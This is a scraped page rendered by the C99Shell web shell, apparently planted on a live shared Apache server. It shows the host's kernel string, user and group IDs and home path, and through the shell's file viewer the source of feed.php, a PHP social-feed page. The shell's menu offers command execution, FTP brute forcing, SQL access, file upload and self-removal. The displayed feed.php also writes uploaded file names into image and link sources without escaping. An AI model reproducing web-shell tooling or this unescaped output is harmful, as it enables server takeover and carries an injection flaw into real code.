!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/home/dh_z2jmpm/   drwx--x---
Free 2065.1 GB of 17882.29 GB (11.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     feed.php (3.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
session_start();
if (!isset($_SESSION['user'])) {
  header('Location: index.php');
  exit;
}
$current_user = $_SESSION['user'];
?>
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Jedi-Sec Feed</title>
  <style>
    body {
      background: black;
      color: #00ff00;
      font-family: monospace;
      padding: 2rem;
    }
    .post-form, .post {
      border: 1px solid #00ff00;
      padding: 1rem;
      margin-bottom: 1rem;
    }
    input, select, textarea, button {
      background: black;
      border: 1px solid #00ff00;
      color: #00ff00;
      padding: 0.5rem;
      width: 100%;
      margin-bottom: 0.5rem;
      font-family: monospace;
    }
    .timestamp {
      font-size: 0.8em;
      color: #00aa00;
    }
    .content img, .content video {
      max-width: 100%;
      margin-top: 0.5rem;
    }
  </style>
</head>
<body>
<?php include 'navbar.php'; ?>
  <h1>Welcome @<?= htmlspecialchars($current_user) ?></h1>

  <form class="post-form" method="post" action="post.php" enctype="multipart/form-data">
    <textarea name="content" placeholder="Say something..." required></textarea>
    <input type="file" name="upload">
    <select name="visibility">
      <option value="public">Public</option>
      <option value="friends">Friends Only</option>
      <option value="private">Private</option>
    </select>
    <button type="submit">Post</button>
  </form>

  <?php
  $users_dir = __DIR__ . '/users/';
  $all_posts = [];

  foreach (glob($users_dir . '*.json') as $file) {
    $data = json_decode(file_get_contents($file), true);
    $username = $data['username'] ?? 'unknown';
    foreach ($data['posts'] ?? [] as $post) {
      $post['username'] = $username;
      $post['owner'] = ($username === $current_user);
      $post['friends'] = $data['friends'] ?? [];
      $all_posts[] = $post;
    }
  }

  usort($all_posts, function($a, $b) {
    return strtotime($b['timestamp']) - strtotime($a['timestamp']);
  });

  foreach ($all_posts as $post) {
    $v = $post['visibility'] ?? 'public';
    $allowed = $v === 'public' || ($v === 'friends' && in_array($current_user, $post['friends'])) || ($v === 'private' && $post['owner']);
    if (!$allowed) continue;

    echo '<div class="post">';
    echo '<div><strong><a href="profile.php?user=' . htmlspecialchars($post['username']) . '" style="color:#00ff00;">@' . htmlspecialchars($post['username']) . '</a></strong></div>';
    echo '<div class="timestamp">' . htmlspecialchars(date('Y-m-d H:i', strtotime($post['timestamp']))) . '</div>';
    echo '<div class="content">' . htmlspecialchars($post['content']);
    if (!empty($post['filename'])) {
      $file = 'uploads/' . $post['filename'];
      $ext = pathinfo($file, PATHINFO_EXTENSION);
      if (in_array(strtolower($ext), ['jpg','jpeg','png','gif'])) {
        echo '<br><img src="' . $file . '">';
      } elseif ($ext === 'mp4') {
        echo '<br><video controls src="' . $file . '"></video>';
      } elseif ($ext === 'pdf') {
        echo '<br><a href="' . $file . '" target="_blank">[PDF]</a>';
      }
    }
    echo '</div></div>';
  }
  ?>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0248 ]--